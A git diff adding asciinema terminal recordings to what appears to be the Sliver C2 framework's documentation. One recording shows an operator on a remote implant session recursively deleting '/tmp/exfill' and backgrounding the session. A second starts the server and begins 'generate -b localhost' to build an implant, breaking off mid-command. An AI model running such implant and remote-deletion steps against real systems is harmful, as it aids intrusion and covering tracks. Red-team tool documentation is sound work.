+[54.36483, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[54.365155, "o", "\u001b[133D\u001b[1A\u001b[30D\u001b[26C\u001b[133D\u001b[30C\u001b[?25h"] +[54.690116, "o", "\u001b[?25l\u001b[133D"] +[54.691211, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[54.695359, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[31D\u001b[26C\u001b[133D\u001b[31C\u001b[?25h"] +[54.973552, "o", "\u001b[31D\u001b[26C\u001b[6n"] +[54.984703, "o", "\u001b[133D\u001b[31C\u001b[0J\u001b[133D\r\r\n\u001b[0 q\r\n"] +[54.993091, "o", "\u001b[1mCommand:\u001b[0m rm [remote path]\r\n\u001b[1mAbout:\u001b[0m Delete a remote file or directory.\r\n\r\n"] +[55.002599, "o", "Usage:\r\n rm [flags]\r\n\r\nFlags:\r\n -F, --force ignore safety and forcefully remove files\r\n -h, --help help for rm\r\n -r, --recursive recursively remove files\r\n -t, --timeout int grpc timeout in seconds (default 60)\r\n"] +[55.003053, "o", "\r\n"] +[55.021012, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[55.021857, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[55.024218, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[56.028095, "o", "\u001b[?25l"] +[56.029855, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[56.034368, "o", "r\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[56.229518, "o", "\u001b[?25l\u001b[133D"] +[56.230135, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[56.232862, "o", "\u001b[1m\u001b[32mrm\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[28D\u001b[26C\u001b[133D\u001b[28C\u001b[?25h"] +[56.47673, "o", "\u001b[?25l"] +[56.484665, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[56.494073, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[29D\u001b[26C\u001b[133D\u001b[29C\u001b[?25h"] +[56.829576, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[56.840738, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[30D\u001b[26C\u001b[133D\u001b[30C\u001b[?25h"] +[57.139811, "o", "\u001b[?25l"] +[57.145956, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[57.155492, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[57.157097, "o", "\u001b[1A\u001b[31D\u001b[26C\u001b[133D\u001b[31C\u001b[?25h"] +[57.313045, "o", "\u001b[?25l"] +[57.313559, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[57.330045, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[32D\u001b[26C\u001b[133D\u001b[32C\u001b[?25h"] +[57.776701, "o", "\u001b[?25l"] +[57.782545, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[57.787146, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[57.788605, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[33D\u001b[26C\u001b[133D\u001b[33C\u001b[?25h"] +[57.9755, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[57.981461, "o", "\u001b[6n"] +[57.986792, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/t\u001b[0m\u001b[0K\u001b[49m\r"] +[57.988611, "o", "\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[34D\u001b[26C\u001b[133D\u001b[34C\u001b[?25h"] +[58.076161, "o", "\u001b[?25l"] +[58.077786, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[58.083459, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/tm\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[58.083676, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[35D\u001b[26C\u001b[133D\u001b[35C\u001b[?25h"] +[58.217578, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[58.221397, "o", "\u001b[6n"] +[58.229071, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/tmp\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[36D\u001b[26C\u001b[133D\u001b[36C\u001b[?25h"] +[58.484841, "o", "\u001b[?25l"] +[58.486855, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[58.49053, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/tmp/\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[37D\u001b[26C\u001b[133D\u001b[37C\u001b[?25h"] +[58.662608, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[58.674237, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/tmp/e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[58.676117, "o", "\u001b[133D\u001b[1A\u001b[38D\u001b[26C\u001b[133D\u001b[38C\u001b[?25h"] +[58.885848, "o", "\u001b[?25l\u001b[133D"] +[58.887134, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[58.889124, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/tmp/ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[58.889879, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[39D\u001b[26C\u001b[133D\u001b[39C\u001b[?25h"] +[59.128129, "o", "\u001b[?25l"] +[59.131804, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[59.143565, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/tmp/exf\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A"] +[59.144794, "o", "\u001b[40D\u001b[26C\u001b[133D\u001b[40C\u001b[?25h"] +[59.258708, "o", "\u001b[?25l"] +[59.266848, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[59.284696, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/tmp/exfi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[41D\u001b[26C"] +[59.286484, "o", "\u001b[133D\u001b[41C\u001b[?25h"] +[59.340655, "o", "\u001b[?25l"] +[59.3422, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[59.348732, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/tmp/exfil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A"] +[59.349041, "o", "\u001b[42D\u001b[26C\u001b[133D\u001b[42C\u001b[?25h"] +[59.539838, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[59.550462, "o", "\u001b[1m\u001b[32mrm \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m/tmp/exfill\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[59.551949, "o", "\u001b[1A\u001b[43D\u001b[26C\u001b[133D\u001b[43C\u001b[?25h"] +[60.057831, "o", "\u001b[43D\u001b[26C\u001b[6n"] +[60.072751, "o", "\u001b[133D\u001b[43C\u001b[0J\u001b[133D\r\r\n"] +[60.078171, "o", "\u001b[0 q\r\n"] +[60.162065, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0m/tmp/exfill"] +[60.163024, "o", "\r\n\r\n"] +[60.172891, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[60.172992, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[60.17361, "o", "\u001b[6n"] +[60.174878, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[60.175364, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[61.506818, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[61.519925, "o", "b\u001b[0m\u001b[0K\u001b[49m"] +[61.520232, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[61.648884, "o", "\u001b[?25l"] +[61.654555, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[61.655516, "o", "\u001b[6n"] +[61.66245, "o", "ba\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[28D\u001b[26C\u001b[133D\u001b[28C\u001b[?25h"] +[61.763687, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[61.772785, "o", "bac\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[61.774208, "o", "\u001b[133D\u001b[1A\u001b[29D\u001b[26C\u001b[133D\u001b[29C\u001b[?25h"] +[61.901736, "o", "\u001b[?25l"] +[61.909131, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[61.916763, "o", "back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[61.918509, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[30D\u001b[26C\u001b[133D\u001b[30C\u001b[?25h"] +[62.095083, "o", "\u001b[?25l"] +[62.104087, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[62.114625, "o", "backg\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[62.118208, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[31D\u001b[26C\u001b[133D\u001b[31C\u001b[?25h"] +[62.150008, "o", "\u001b[?25l"] +[62.151659, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[62.155565, "o", "backgr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[32D\u001b[26C\u001b[133D"] +[62.156688, "o", "\u001b[32C\u001b[?25h"] +[62.232795, "o", "\u001b[?25l\u001b[133D"] +[62.235609, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[62.242081, "o", "backgro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[33D\u001b[26C\u001b[133D\u001b[33C\u001b[?25h"] +[62.311331, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[62.312801, "o", "\u001b[6n"] +[62.317158, "o", "backgrou\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A"] +[62.318205, "o", "\u001b[34D\u001b[26C\u001b[133D\u001b[34C\u001b[?25h"] +[62.403753, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[62.418615, "o", "backgroun\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[62.420727, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[35D\u001b[26C\u001b[133D\u001b[35C\u001b[?25h"] +[62.550808, "o", "\u001b[?25l"] +[62.553025, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[62.564944, "o", "\u001b[1m\u001b[32mbackground\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[62.566567, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[36D\u001b[26C\u001b[133D\u001b[36C\u001b[?25h"] +[63.215621, "o", "\u001b[36D\u001b[26C\u001b[6n"] +[63.221885, "o", "\u001b[133D\u001b[36C\u001b[0J\u001b[133D\r\r\n"] +[63.223105, "o", "\u001b[0 q\r\n"] +[63.252738, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBackground ...\r\n\r\n"] +[63.264182, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[1 q"] +[63.265338, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[63.267781, "o", "\u001b[0m\u001b[0K\u001b[49m\r"] +[63.267882, "o", "\r\n\u001b[0K\u001b[0J\u001b[133D"] +[63.268817, "o", "\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[64.020589, "o", "^C"] +[64.021731, "o", "\u001b[9D\u001b[9C\u001b[6n"] +[64.034182, "o", "\u001b[133D\u001b[11C\u001b[0J\u001b[133D\r\r\n\u001b[0 q\r\n"] +[64.036778, "o", "Confirm exit (Y/y, Ctrl-C): "] +[64.604792, "o", "y"] +[64.922733, "o", "\r\n"] +[64.963795, "o", "\u001b[?2004hroot@98df0494f659:~# "] +[65.410568, "o", "\u001b[?2004l\r\r\n"] +[65.411491, "o", "exit\r\n"] diff --git a/docs/sliver-docs/public/asciinema/first-implant.cast b/docs/sliver-docs/public/asciinema/first-implant.cast new file mode 100644 index 0000000000..8d2142b23a --- /dev/null +++ b/docs/sliver-docs/public/asciinema/first-implant.cast @@ -0,0 +1,549 @@ +{"version": 2, "width": 133, "height": 91, "timestamp": 1714567775, "env": {"SHELL": "/bin/bash", "TERM": "screen"}} +[0.135265, "o", "\u001b[?2004h"] +[0.142879, "o", "root@98df0494f659:~# "] +[0.769041, "o", "."] +[0.814356, "o", "/"] +[0.958219, "o", "s"] +[1.076673, "o", "l"] +[1.207847, "o", "i"] +[1.28843, "o", "v"] +[1.343393, "o", "e"] +[1.4888, "o", "r"] +[1.712271, "o", "-server "] +[2.478212, "o", "\r\n"] +[2.479562, "o", "\u001b[?2004l\r"] +[3.561849, "o", "\u001b[32m\r\r\n ███████╗██╗ ██╗██╗ ██╗███████╗██████╗\r\r\n ██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗\r\r\n ███████╗██║ ██║██║ ██║█████╗ ██████╔╝\r\r\n ╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗\r\r\n ███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║\r\r\n ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝\r\r\n\u001b[0m\r\nAll hackers gain living weapon\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - 0b235b4d42d4eb75684825f5d5b30da71ec57d26 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n"] +[3.566255, "o", "\r\n"] +[3.592346, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[3.594255, "o", "\u001b[1 q"] +[3.596777, "o", "\u001b[?25l"] +[3.597555, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[3.600449, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[3.601115, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A"] +[3.601397, "o", "\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[4.240694, "o", "\u001b[?25l\u001b[133D"] +[4.241228, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[4.244531, "o", "\u001b[6n"] +[4.251274, "o", "g\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[10D\u001b[9C\u001b[133D\u001b[10C\u001b[?25h"] +[4.351169, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.36482, "o", "ge\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[11D\u001b[9C\u001b[133D\u001b[11C\u001b[?25h"] +[4.495238, "o", "\u001b[?25l\u001b[133D"] +[4.500476, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.506985, "o", "gen\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[12D\u001b[9C\u001b[133D\u001b[12C"] +[4.509269, "o", "\u001b[?25h"] +[4.543745, "o", "\u001b[?25l"] +[4.545789, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.54917, "o", "gene\u001b[0m\u001b[0K\u001b[49m"] +[4.550012, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[13D\u001b[9C\u001b[133D\u001b[13C\u001b[?25h"] +[4.685727, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.698542, "o", "gener\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[14D\u001b[9C\u001b[133D\u001b[14C\u001b[?25h"] +[4.786003, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.792822, "o", "genera\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[15D\u001b[9C\u001b[133D\u001b[15C\u001b[?25h"] +[4.992792, "o", "\u001b[?25l\u001b[133D"] +[4.993406, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.997917, "o", "generat\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[16D\u001b[9C\u001b[133D\u001b[16C\u001b[?25h"] +[5.008804, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.009145, "o", "\u001b[6n"] +[5.013429, "o", "\u001b[1m\u001b[32mgenerate\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A"] +[5.015042, "o", "\u001b[17D\u001b[9C\u001b[133D\u001b[17C\u001b[?25h"] +[5.086232, "o", "\u001b[?25l"] +[5.088629, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.093719, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[18D\u001b[9C\u001b[133D\u001b[18C\u001b[?25h"] +[5.631958, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.64081, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.642473, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[19D\u001b[9C\u001b[133D\u001b[19C\u001b[?25h"] +[6.02906, "o", "\u001b[?25l"] +[6.029832, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.043398, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[20D\u001b[9C\u001b[133D\u001b[20C\u001b[?25h"] +[6.195146, "o", "\u001b[?25l"] +[6.199877, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.210895, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[21D\u001b[9C\u001b[133D\u001b[21C\u001b[?25h"] +[6.478378, "o", "\u001b[?25l"] +[6.481273, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.490978, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22ml\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[6.492841, "o", "\u001b[133D\u001b[1A\u001b[22D\u001b[9C\u001b[133D\u001b[22C\u001b[?25h"] +[6.653198, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.663722, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlo\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[23D\u001b[9C\u001b[133D\u001b[23C"] +[6.665943, "o", "\u001b[?25h"] +[6.776329, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[6.777007, "o", "\u001b[6n"] +[6.782323, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mloc\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[6.784155, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[24D\u001b[9C\u001b[133D\u001b[24C\u001b[?25h"] +[6.831454, "o", "\u001b[?25l\u001b[133D"] +[6.83308, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.837562, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mloca\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A"] +[6.83947, "o", "\u001b[25D\u001b[9C\u001b[133D\u001b[25C\u001b[?25h"] +[6.878725, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[6.879492, "o", "\u001b[6n"] +[6.883392, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocal\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[26D\u001b[9C"] +[6.885432, "o", "\u001b[133D\u001b[26C\u001b[?25h"] +[7.212309, "o", "\u001b[?25l"] +[7.219009, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.231271, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalh\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A"] +[7.231559, "o", "\u001b[27D\u001b[9C\u001b[133D\u001b[27C\u001b[?25h"] +[7.280913, "o", "\u001b[?25l\u001b[133D"] +[7.281677, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.287498, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalho\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[7.288969, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[28D\u001b[9C\u001b[133D\u001b[28C\u001b[?25h"] +[7.344144, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.344737, "o", "\u001b[6n"] +[7.349896, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhos\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[29D\u001b[9C\u001b[133D\u001b[29C\u001b[?25h"] +[7.459011, "o", "\u001b[?25l"] +[7.459811, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.469831, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.470447, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[30D\u001b[9C\u001b[133D\u001b[30C\u001b[?25h"] +[7.577106, "o", 